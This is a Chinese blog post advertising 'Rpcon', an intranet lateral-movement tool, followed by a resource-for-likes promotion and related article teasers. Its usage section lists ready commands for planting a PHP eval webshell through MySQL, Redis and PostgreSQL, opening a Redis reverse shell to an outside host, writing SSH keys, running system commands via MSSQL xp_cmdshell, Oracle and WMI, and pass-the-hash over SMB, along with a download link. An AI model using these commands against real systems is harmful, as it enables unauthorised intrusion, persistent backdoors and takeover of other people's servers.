【网络安全】一款内网横向利用工具

最新推荐文章于 2024-07-28 23:11:13 发布
最新推荐文章于 2024-07-28 23:11:13 发布
阅读量989 收藏 23
点赞数 21
分类专栏: 互联网 网络安全 web安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Javachichi/article/details/136036532
版权
互联网 同时被 3 个专栏收录
841 篇文章 106 订阅
订阅专栏
网络安全
269 篇文章 11 订阅
订阅专栏
web安全
210 篇文章 4 订阅
订阅专栏 
项目地址:https://github.com/YusinoMy/Rpcon

介绍

Rpcon,内网远程连接利用工具,用于ssh smb 等常规服务Cancel changes

目前支持ssh远程连接执行命令

2023.3.24更新:

redis远程连接执行命令 redis一键写入webshell,一键反弹shell,一键写入公钥

2023.3.26更新:

mysql远程连接执行命令 mysql一键写入webshell

2023.3.27更新:

wmiexec无回显命令执行

2023.3.28更新:

优化某些代码

mssql模块

1:xcmdhshell 一键利用

2:OLE一键利用

2023.3.29更新:

oracle利用模块:shellrun函数执行系统命令

关于oracle模块报错

2023.3.30更新:

暂时移除oracle 使用可以从cmd/oracle.go import包中去除//再按照上文参考配置

Postgersql模块

1:一键写入webshell

2:命令执行

Smb模块

2023.4.4更新

解决linux打包问题

使用方法:

写入shell默认为<?php @eval($_POST[1]);?>``-p 指定端口``-f 指定文件  列入shell文件` `-pt 写入目录``-u 用户``-pw 密码``-d 指定数据库名称``-c 执行的命令或者数据库语法``   ``mysql:``执行查询``rpcon -u root -pw root -m mysql -c "show databases;"``一键写shell:``rpcon  -u root -pw root -r mysl -f sss/1.php -pt /var/html/www` `一键读取配置``rpcon -u root -pw root -r mycg``   ``redis:``执行查询``rpcon -u  -pw -m redis -c ""``一键写入公钥``rpcon -u -pw -r rk -pt rsa.xx``一键写入shell``rpcon -u -pw -r rs  -f 11.php -pt 目标目录``一键反弹shell  <有点鸡肋某些情况会反弹失败>``rpcon -u -pw -r rn   -ws 8.8.8.8 -wp 666``   ``   ``mssql``执行查询:``rpcon -u sa -pw sa -m mssql -c ""``读取配置:``rpcon -u sa -pw sa -r mssg` `执行命令``rpcon -u sa -pw sa -r cmdshell -c whoami``rpcon -u sa -pw sa -r oleshell -c whoami``   ``oracle:``执行查询:``rpcon  -u sys -pw sys -m oracle -c ""``读取配置``rpcon -u sys -pw sys -r org` `执行命令``rpcon -u sys -pw sys -r ors -c whoami``   ``postgresql``执行查询:``rpcon -u postgres -pw 123456 -m postgres -c ""``读取配置``rpcon -u postgres -pw 123456 -r pocfg` `写入shell``rpcon -u postgres -pw 123456 -r poshell -f 11.php -pt /var/html/www``执行命令``rpcon -u postgres -pw 123456 -r pocde -c whoami``   ``   ``wmicexec:``rpcon -u administratros -pw 123456 -m wmi -c` `hash:``rpcon -u administrators -hash aaaaaaaaa -m wmi -c` `   ``smb:``rpcon -u administrators -pw 123456 -f 文件 -pt 目录``hash:``rpcon -u administrators -hash aaaaaaaaa -f 文件 -pt 目录

工具下载链接:

https://pan.quark.cn/s/7e3bbae1af4d

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

Python_chichi
关注
专栏目录
内网渗透-内置工具横向移动
lza20001103的博客
10-01 1248
内置工具横向移动 文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记 前言 前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view 当前的域有哪些主机 net use 查看当前是否有
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 701
远程桌面软件,开箱即用,无需任何配置,完美替代TeamViewer。您完全掌控数据,不用担心安全问题。使用我们的注册/中继服务器,或者自己设置,亦或者开发您的版本。可以看到没有密码,这个时候需要手写这个密码,然后重启工具。我们将这段内容复制下来,然后再本地新建一个文本文件。我们再回头查看一下我们的配置文件,发现已经被替换了。然后写上我们的密码,注意这里的密码一定要6位。然后我们再去查看配置文件,密码就被显示出来了。然后将文件上传到目标机器进行替换。通过cs上传到目标机器。
细说内网横向工具WMIHACK
Lsec的博客
07-11 1993
1.前言 此工具为香山大佬开源的一款内网横向渗透工具,阅读源码后被大佬的思路及所使用的技术细节所震撼,并始终认为对于wmi没有一定了解是无法写出如此精妙的代码,获益良多。本文不对工具的使用做太多讲解,关于使用网上的文章已经太多了,只探讨背后的技术细节。 项目地址:https://github.com/360-Linton-Lab/WMIHACKER 1 基础知识 2.1 WMI简介 WMI 的全称是 Windows Management Instrumentation,即 Windows 管理
一款内网横向渗透辅助工具
weixin_46211944的博客
08-04 685
配合使用工具(如Mimikatz)扫描本地密码,并将密码写入source/pass_list.txt 以下工具(1)简称(1)(1)检测域。检测到域后,工具(2)自动使用 “net user /domain”等语法检测判断域用户(3)探索其他存活域主机:自动将网段IP信息写入source/ip_list.txt)语法:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I |findstr "TTL="(4)将本机wifi密码并输出至屏幕。...
内网安全--横向移动【2】&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
LfanBQX的博客
07-04 2024
WMI是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
内网横向——利用WMI进行内网横向
最新发布
qq_55202378的博客
07-28 703
WMI(Windows Management Instrumentation,Windows管理规范)是一项核心的windows管理技术。从Windows 98开始,windows操作系统都支持WMI。用户可以通过WMI管理本地和远程计算机。Windows为远程传输WMI数据提供了两个可用的协议,即分布式组件对象模型()和windows远程管理(,WinRM),使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等都可以远程执行。
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1. **Ngrok测试演示**:Ngrok是一款开源工具,能创建一个公共URL,将流量转发到内网的任何TCP服务。在这个案例中,我们注册并配置Ngrok,设置HTTP协议和本地端口,然后在内网1执行后门程序,内网2监听并接受连接。...
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2337
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
【工控安全职业证书技能实践:内网横向渗透测试与实战】 工控安全涉及的是工业控制系统中的网络安全,它要求专业人士具备识别、防范和应对安全威胁的能力。本实践课程旨在教授学员如何进行内网横向渗透测试,模拟...
内网安全学习(二)---横向渗透
qi_SJQ_的博客
02-09 4151
横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。 1.横向渗透—明文传递at&schtasks: 在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 [at] & [sc
内网环境下的横向移动总结
hongduilanjun的博客
07-21 2693
前言在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...
内网安全横向移动(冰蝎&&msf&&IPC$)
hack0919的博客
04-21 905
冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。
内网安全横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1248
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
2024HW ---->内网横向移动
huohaowen的博客
04-21 1371
在蓝队的面试过程中,如果你会内网渗透的话,那是肯定的一个加分选项!!!那么从今天开始,我们就来讲一下内网横向移动!!!
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4717
作者:WHOAMI,转载于freebuf。 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
内网安全第一百二十八天
B_l_a_nk的博客
07-24 611
1、横向移动-IPC&at&schtasks 2、横向移动-Impacket套件&CS插件 3、横向移动-Socks代理自定义脚本批量
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1811
内网环境下的横向移动总结
一款内网自动化横向工具:InScan开源扫描器
Ms08067安全实验室
04-12 5632
InScan-开源扫描器工具简介本工具只可用于安全性测试,误用于非法用途!工具定位边界打点后的自动化内网工具,完全与服务端脱离。服务端只用于生成poc,网段信息等配置。内网渗透痛点目前已有...
安全(3)相关工具内网横向移动中的运用
weixin_51339377的博客
03-27 771
1.mimikatz在内网中的使用 域环境下用户的信息储存在ntds.dit中 加密后为散列值 windows密码一般由两部分 LM Hash + NTLM Hash user1:RID:LM-HASH:NT-HASH 1.在kali中输入mimikatz可以获取该工具的地址 /usr/share/windows-resources/mimikatz 2.只需要把mimikatz文件夹下的x64复制到目标计算机上即可 3.接下来在msf中的system权限下对该计算机..
内网渗透技术:横向移动学习笔记
"这篇内网横向移动学习备忘录主要探讨了在内网渗透测试中的横向移动技术,涉及网络环境的构建、攻击者的条件、利用方式以及相关的命令工具。作者通过一个具体的场景,即攻击者已经获得了Windows 7跳板机的权限,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值